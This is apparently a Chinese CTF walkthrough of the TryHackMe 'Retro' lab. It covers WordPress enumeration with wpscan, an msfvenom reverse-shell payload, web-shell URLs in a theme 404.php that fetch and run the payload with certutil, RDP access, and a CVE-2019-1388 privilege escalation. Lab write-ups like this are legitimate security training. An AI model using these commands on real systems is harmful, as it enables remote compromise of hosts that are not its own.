TryHackMe-Retro

难度:简单

0x01 信息收集

nmap

image-20200930114911464

http

image-20200930115719108

image-20200930115642890

wordpress

1
wpscan --url http://ip/retro -e u
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
[+] URL: http://10.10.59.241/Retro/ [10.10.59.241]
[+] Started: Wed Sep 30 04:29:59 2020

Interesting Finding(s):

[+] Headers
| Interesting Entries:
| - Server: Microsoft-IIS/10.0 | - X-Powered-By: PHP/7.1.29
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.59.241/Retro/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://10.10.59.241/Retro/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.59.241/Retro/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60% | References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.59.241/retro/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator
>
| - http://10.10.59.241/retro/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>

[+] WordPress theme in use: 90s-retro
| Location: http://10.10.59.241/Retro/wp-content/themes/90s-retro/
| Latest Version: 1.4.10 (up to date)
| Last Updated: 2019-04-15T00:00:00.000Z
| Readme: http://10.10.59.241/Retro/wp-content/themes/90s-retro/readme.txt
| Style URL: http://10.10.59.241/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1
| Style Name: 90s Retro
| Style URI: https://organicthemes.com/retro-theme/
| Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 9
0s!? Probably n...
| Author: Organic Themes

[+] The external WP-Cron seems to be enabled: http://10.10.59.241/Retro/wp-cron.php [13/1922]
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.59.241/retro/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator
>
| - http://10.10.59.241/retro/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</
generator>

[+] WordPress theme in use: 90s-retro
| Location: http://10.10.59.241/Retro/wp-content/themes/90s-retro/
| Latest Version: 1.4.10 (up to date)
| Last Updated: 2019-04-15T00:00:00.000Z
| Readme: http://10.10.59.241/Retro/wp-content/themes/90s-retro/readme.txt
| Style URL: http://10.10.59.241/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1
| Style Name: 90s Retro
| Style URI: https://organicthemes.com/retro-theme/
| Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 9
0s!? Probably n...
| Author: Organic Themes
| Author URI: https://organicthemes.com
|
| Found By: Css Style In Homepage (Passive Detection) |
| Version: 1.4.10 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.59.241/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1, Match: 'Version: 1.4
.10'

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:06 <=======================> (10 / 10) 100.00% Time: 00:00:06

[i] User(s) Identified:

[+] wade
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.59.241/retro/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] Wade
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[0/1922]
[+] WordPress theme in use: 90s-retro
| Location: http://10.10.59.241/Retro/wp-content/themes/90s-retro/
| Latest Version: 1.4.10 (up to date)
| Last Updated: 2019-04-15T00:00:00.000Z
| Readme: http://10.10.59.241/Retro/wp-content/themes/90s-retro/readme.txt
| Style URL: http://10.10.59.241/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1 | Style Name: 90s Retro
| Style URI: https://organicthemes.com/retro-theme/
| Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 9
0s!? Probably n...
| Author: Organic Themes
| Author URI: https://organicthemes.com
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4.10 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.59.241/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1, Match: 'Version: 1.4
.10'

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:06 <=======================> (10 / 10) 100.00% Time: 00:00:06

[i] User(s) Identified:

[+] wade
| Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.59.241/retro/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] Wade
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/
sign_up

[+] Finished: Wed Sep 30 04:30:21 2020
[+] Requests Done: 52
[+] Cached Requests: 6
[+] Data Sent: 10.477 KB
[+] Data Received: 239.011 KB
[+] Memory used: 171.227 MB
[+] Elapsed time: 00:00:21

image-20200930123748045

image-20200930123806555

image-20200930131945379

先生成shell

1
msfvenom -p windows/shell_reverse_tcp LHOST=Your ip LPORT=1234 -f exe -o shell-thm.exe

访问这个主题的404页面并下载执行shell。

1
2
3
http://10.10.59.241/Retro/wp-content/themes/twentysixteen/404.php?cmd=certutil%20-urlcache%20-split%20-f%20http:%2f%2fYour-IP:8000%2fshell-thm.exe

http://10.10.59.241/Retro/wp-content/themes/twentysixteen/404.php?cmd=shell-thm.exe

拿到shell。。

image-20200930131930082

RDP

在博客上拿到密码后,完全!不!需要!在wordpress上反弹个shell。因为可以直接rdp连接。。。做到一半才想起来还开着RDP。。

image-20200930133020922

chrome浏览历史中有多次出现CVE-2019-1388

image-20200930133116757

详细的复现过程:

总的来说就是,弹出输入密码的时候,通过点击文件的ca文件来打开浏览器,在浏览器中保存当前页面为 然后路径输入C:\windowys\system32\*.*跳转到system32目录下,并且能显示其他格式的文件(如果自己去点目录到system32的话,只有文件夹)之后再找到cmd 右键打开。

image-20200930134048061

😓,,,